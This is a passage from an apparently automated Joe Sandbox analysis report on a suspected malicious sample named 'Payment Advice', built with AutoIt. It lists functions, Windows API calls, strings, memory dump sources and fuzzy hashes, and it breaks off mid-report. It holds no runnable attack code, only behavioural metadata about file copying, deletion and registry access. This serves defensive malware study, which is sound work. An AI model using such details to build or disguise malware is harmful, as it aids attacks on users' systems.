TranslateMessage.USER32(?), ref: 0058ED3F
DispatchMessageW.USER32(?), ref: 0058ED4A
LockWindowUpdate.USER32(00000000), ref: 0058ED79
DestroyWindow.USER32 ref: 0058ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0058ED9F
Sleep.KERNEL32(0000000A), ref: 005F5270
TranslateMessage.USER32(?), ref: 005F59F7
DispatchMessageW.USER32(?), ref: 005F5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005F5A19

Strings

@GUI_WINHANDLE, xrefs: 005F5360
@GUI_CTRLID, xrefs: 005F5314
@TRAY_ID, xrefs: 005F54C9
@GUI_CTRLHANDLE, xrefs: 005F53AC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 4f9e85b72662024365d49d4ab69b48ac8eca3875b43d47180865591c6668b900
Instruction ID: 265f96e6c2ecc24407d4415c0b680fc231e4c1be0b275e8300cb1da6a6d43c68
Opcode Fuzzy Hash: 4f9e85b72662024365d49d4ab69b48ac8eca3875b43d47180865591c6668b900
Instruction Fuzzy Hash: 0462E230504345DFDB24EF24C88ABAA7FE5BF85300F14496DEE869B292DB74D848CB52

Function 005B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 005B5EC3
___createFile.LIBCMT ref: 005B5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005B5F2D
__dosmaperr.LIBCMT ref: 005B5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 005B5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 005B5F6A
__dosmaperr.LIBCMT ref: 005B5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005B5F7C
__set_osfhnd.LIBCMT ref: 005B5FAC
__lseeki64_nolock.LIBCMT ref: 005B6016
__close_nolock.LIBCMT ref: 005B603C
__chsize_nolock.LIBCMT ref: 005B606C
__lseeki64_nolock.LIBCMT ref: 005B607E
__lseeki64_nolock.LIBCMT ref: 005B6176
__lseeki64_nolock.LIBCMT ref: 005B618B
__close_nolock.LIBCMT ref: 005B61EB

Part of subcall function 005AEA9C: FindCloseChangeNotification.KERNELBASE(00000000,0062EEF4,00000000,?,005B6041,0062EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005AEAEC
Part of subcall function 005AEA9C: GetLastError.KERNEL32(?,005B6041,0062EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005AEAF6
Part of subcall function 005AEA9C: __free_osfhnd.LIBCMT ref: 005AEB03
Part of subcall function 005AEA9C: __dosmaperr.LIBCMT ref: 005AEB25

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

__lseeki64_nolock.LIBCMT ref: 005B620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 005B6342
___createFile.LIBCMT ref: 005B6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 005B636E
__dosmaperr.LIBCMT ref: 005B6375
__free_osfhnd.LIBCMT ref: 005B6395
__invoke_watson.LIBCMT ref: 005B63C3
__wsopen_helper.LIBCMT ref: 005B63DD

Strings

@, xrefs: 005B5F98

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$Close___create$Handle__close_nolock__free_osfhnd$ChangeFindNotificationType__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3388700018-2766056989
Opcode ID: 5ffd22bac2f7ed61f1af0c579ccfe11baa812413d8a9b084aba62c45f9c6cae5
Instruction ID: 0981098e0316d0819249d065e3b3f741aa8ff613e9765597a032ccd207481bdc
Opcode Fuzzy Hash: 5ffd22bac2f7ed61f1af0c579ccfe11baa812413d8a9b084aba62c45f9c6cae5
Instruction Fuzzy Hash: 4A22477190460A9FEF299F68DC49BFD7F61FB45320F284628E5219B2D2D339AE40CB51

Function 005CFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 005CFA96
_wcschr.LIBCMT ref: 005CFAA4
_wcscpy.LIBCMT ref: 005CFABB
_wcscat.LIBCMT ref: 005CFACA
_wcscat.LIBCMT ref: 005CFAE8
_wcscpy.LIBCMT ref: 005CFB09
__wsplitpath.LIBCMT ref: 005CFBE6
_wcscpy.LIBCMT ref: 005CFC0B
_wcscpy.LIBCMT ref: 005CFC1D
_wcscpy.LIBCMT ref: 005CFC32
_wcscat.LIBCMT ref: 005CFC47
_wcscat.LIBCMT ref: 005CFC59
_wcscat.LIBCMT ref: 005CFC6E

Part of subcall function 005CBFA4: _wcscmp.LIBCMT ref: 005CC03E
Part of subcall function 005CBFA4: __wsplitpath.LIBCMT ref: 005CC083
Part of subcall function 005CBFA4: _wcscpy.LIBCMT ref: 005CC096
Part of subcall function 005CBFA4: _wcscat.LIBCMT ref: 005CC0A9
Part of subcall function 005CBFA4: __wsplitpath.LIBCMT ref: 005CC0CE
Part of subcall function 005CBFA4: _wcscat.LIBCMT ref: 005CC0E4
Part of subcall function 005CBFA4: _wcscat.LIBCMT ref: 005CC0F7

Strings

t2c, xrefs: 005CFC97
>>>AUTOIT SCRIPT<<<, xrefs: 005CFA61

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2c
API String ID: 2955681530-1490249227
Opcode ID: 5f850542186f6339e0f36812926b3c78ebc11d4dc97a52e9f2aecc5f19fcea33
Instruction ID: 8f610cb3775e80681b07892b793ddc26e47b364e0846987ab35bda77bf6b2603
Opcode Fuzzy Hash: 5f850542186f6339e0f36812926b3c78ebc11d4dc97a52e9f2aecc5f19fcea33
Instruction Fuzzy Hash: 6691A372504306AFDB10EB94C855F9EBBE9BF84310F04486DF98997292DB30EE44CB91

Function 005AEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: fe1a2cc25f6f16b753f2d62dd92f85a005c04559b99b104b65604a349debb59b
Instruction ID: f7724220e957e512c2d61d02d5104ef922195f262b9b1d26cd03d430373f31c7
Opcode Fuzzy Hash: fe1a2cc25f6f16b753f2d62dd92f85a005c04559b99b104b65604a349debb59b
Instruction Fuzzy Hash: DC323874E04256DFDB218FE8D880BAD7FB2BF4B314F24456AE9559B292C7309C42CB60

Function 00583F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00583F86
RegisterClassExW.USER32(00000030), ref: 00583FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00583FC1
InitCommonControlsEx.COMCTL32(?), ref: 00583FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00583FEE
LoadIconW.USER32(000000A9), ref: 00584004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00584013

Strings

AutoIt v3 GUI, xrefs: 00583FA2
+, xrefs: 00583F6F
TaskbarCreated, xrefs: 00583FB6
0, xrefs: 00583F68

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 845d79d34f14d60b7a0f5b1135c864a0d6da10d87e4919f57997511c554f567a
Instruction ID: 0cc8917383d49f4180c5532fa7bb9fa00aecf3479113eea649d497705c8b3670
Opcode Fuzzy Hash: 845d79d34f14d60b7a0f5b1135c864a0d6da10d87e4919f57997511c554f567a
Instruction Fuzzy Hash: CE21C9B9940319AFDB00DFE4E849BCEBBB6FB0A700F11521AF515AA2A0D7B54584CF91

Function 005CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005CBDB4: __time64.LIBCMT ref: 005CBDBE

Part of subcall function 00584517: _fseek.LIBCMT ref: 0058452F

__wsplitpath.LIBCMT ref: 005CC083

Part of subcall function 005A1DFC: __wsplitpath_helper.LIBCMT ref: 005A1E3C

_wcscpy.LIBCMT ref: 005CC096
_wcscat.LIBCMT ref: 005CC0A9
__wsplitpath.LIBCMT ref: 005CC0CE
_wcscat.LIBCMT ref: 005CC0E4
_wcscat.LIBCMT ref: 005CC0F7
_wcscmp.LIBCMT ref: 005CC03E

Part of subcall function 005CC56D: _wcscmp.LIBCMT ref: 005CC65D
Part of subcall function 005CC56D: _wcscmp.LIBCMT ref: 005CC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005CC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 005CC338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 005CC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005CC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005CC371

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: d9702277f91e44057b0ae69107bdf3dcc48a620c9ee261a7c1cb208ad1e28251
Instruction ID: 39c15eeab65c4e73d6866bc3bc88c44781a13f6fe3bfa1d1026714ce8d141764
Opcode Fuzzy Hash: d9702277f91e44057b0ae69107bdf3dcc48a620c9ee261a7c1cb208ad1e28251
Instruction Fuzzy Hash: C4C10BB190021AAEDF11DF95DC85FDEBFB9BF89310F0080AAF609E6151DB719A448F61

Function 00583742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 005837B3
KillTimer.USER32(?,00000001), ref: 005837DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00583800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0058380B
CreatePopupMenu.USER32 ref: 0058381F
PostQuitMessage.USER32(00000000), ref: 0058382E

Strings

TaskbarCreated, xrefs: 00583806

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 8c450e9551aaaab1eed58f6823ff8e521a059db6338800cc82e774f7abb65798
Instruction ID: 6c5990e04b247e793a86544953aecdd900f7b4f5ef2f56fb05e71fd9c359e14e
Opcode Fuzzy Hash: 8c450e9551aaaab1eed58f6823ff8e521a059db6338800cc82e774f7abb65798
Instruction Fuzzy Hash: E24124F524424AABDB147F68EC4EB7A3E5AF742B00F001525FF02E6191DA69DF808761

Function 00583E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00583E79
LoadCursorW.USER32(00000000,00007F00), ref: 00583E88
LoadIconW.USER32(00000063), ref: 00583E9E
LoadIconW.USER32(000000A4), ref: 00583EB0
LoadIconW.USER32(000000A2), ref: 00583EC2

Part of subcall function 00584024: LoadImageW.USER32(00580000,00000063,00000001,00000010,00000010,00000000), ref: 00584048

RegisterClassExW.USER32(?), ref: 00583F30

Part of subcall function 00583F53: GetSysColorBrush.USER32(0000000F), ref: 00583F86
Part of subcall function 00583F53: RegisterClassExW.USER32(00000030), ref: 00583FB0
Part of subcall function 00583F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00583FC1
Part of subcall function 00583F53: InitCommonControlsEx.COMCTL32(?), ref: 00583FDE
Part of subcall function 00583F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00583FEE
Part of subcall function 00583F53: LoadIconW.USER32(000000A9), ref: 00584004
Part of subcall function 00583F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00584013

Strings

AutoIt v3, xrefs: 00583F1F
#, xrefs: 00583F09
0, xrefs: 00583F02

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 69c753b6feb29fdb38bd9d0e69fa1b22e35123f03e510fb9667daa39f9eab7dd
Instruction ID: be01ee7662fca64800ec60a937d20a4269bb7ddfcb2367bd195f720afdddbcd7
Opcode Fuzzy Hash: 69c753b6feb29fdb38bd9d0e69fa1b22e35123f03e510fb9667daa39f9eab7dd
Instruction Fuzzy Hash: 4A2147B8D40314AFCB10DFA9EC45A99BFF6FB4A710F10521AE614AB2A0D7754684CF91

Function 017525C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01752691
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017528B7

Memory Dump Source

Source File: 00000000.00000002.1639436591.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1750000_Payment Advice.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: a007ef566fa60e5e744476fc4e420d154b5d56e3a0f7a50e7f2de745a14baa2a
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: E2A1FA74E00209EBDB54CFE4C894BAEFBB5FF48304F208559E611BB281D7B5AA41CB64

Function 005849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00584A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005F41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005F421A
RegCloseKey.ADVAPI32(?), ref: 005F4249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00584A13
Include, xrefs: 005F41D3, 005F4212

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: fa5e760dc7ab094cf592af5d4daab562a6785a18ad859ddb8fe1b3a62833651a
Instruction ID: b92abdb2fe8f61b788d942f75c9c3efaa721ceda450aba584564e7f802271019
Opcode Fuzzy Hash: fa5e760dc7ab094cf592af5d4daab562a6785a18ad859ddb8fe1b3a62833651a
Instruction Fuzzy Hash: D8113D75A40109BFEB04AFA4CD8ADFF7BADFF04344F005465B906E6191EA709E42DB50

Function 005836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005836E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00583707
ShowWindow.USER32(00000000,?,?,?,?,00583AA3,?), ref: 0058371B
ShowWindow.USER32(00000000,?,?,?,?,00583AA3,?), ref: 00583724

Strings

AutoIt v3, xrefs: 005836DE, 005836E3, 005836E4
edit, xrefs: 00583701

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 08670ec72b8467b2c3811af283e7db1c4cbcc99e7ed45141d50e7008f9d419de
Instruction ID: 8fe2775b60f8e6ce1af237bb4833c43f519f6be5838b6127be5eae8c13885735
Opcode Fuzzy Hash: 08670ec72b8467b2c3811af283e7db1c4cbcc99e7ed45141d50e7008f9d419de
Instruction Fuzzy Hash: 2FF03A785802D07AE7305B97AC08E672E7FD7C7F60B00101ABA04AA1A0C96108C1CAB0

Function 005A7B47 Relevance: 9.0, APIs: 6, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__init_pointers.LIBCMT ref: 005A7B47

Part of subcall function 005A123A: __initp_misc_winsig.LIBCMT ref: 005A125E
Part of subcall function 005A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005A7F51
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005A7F65
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005A7F78
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005A7F8B
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005A7F9E
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005A7FB1
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005A7FC4
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005A7FD7
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005A7FEA
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005A7FFD
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005A8010
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005A8023
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005A8036
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005A8049
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005A805C
Part of subcall function 005A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005A806F

__mtinitlocks.LIBCMT ref: 005A7B4C

Part of subcall function 005A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0063AC68,00000FA0,?,?,005A7B51,005A5E77,00636C70,00000014), ref: 005A7E41

__mtterm.LIBCMT ref: 005A7B55

Part of subcall function 005A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005A7B5A,005A5E77,00636C70,00000014), ref: 005A7D3F
Part of subcall function 005A7BBD: _free.LIBCMT ref: 005A7D46
Part of subcall function 005A7BBD: DeleteCriticalSection.KERNEL32(0063AC68,?,?,005A7B5A,005A5E77,00636C70,00000014), ref: 005A7D68

__calloc_crt.LIBCMT ref: 005A7B7A
GetCurrentThreadId.KERNEL32 ref: 005A7BA3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 82191ebe889aa80f5d760383380496fe33a892e28aca601143570d4a7addcd29
Instruction ID: 2a843dd7c90225d2b28cc54a2b97e054df440410d21a4ca87a71339058b02fcc
Opcode Fuzzy Hash: 82191ebe889aa80f5d760383380496fe33a892e28aca601143570d4a7addcd29
Instruction Fuzzy Hash: CFF06D7210D61F19EA2476747C0AA4F2E99BF8B730F2446A9F8A0C90D2FF21884141B4

Function 00584A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00585374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00641148,?,005861FF,?,00000000,00000001,00000000), ref: 00585392

Part of subcall function 005849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00584A1D

_wcscat.LIBCMT ref: 005F2D80
_wcscat.LIBCMT ref: 005F2DB5

Strings

\Include\, xrefs: 00584B0A
8!d, xrefs: 00584B1C
\, xrefs: 005F2DA2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

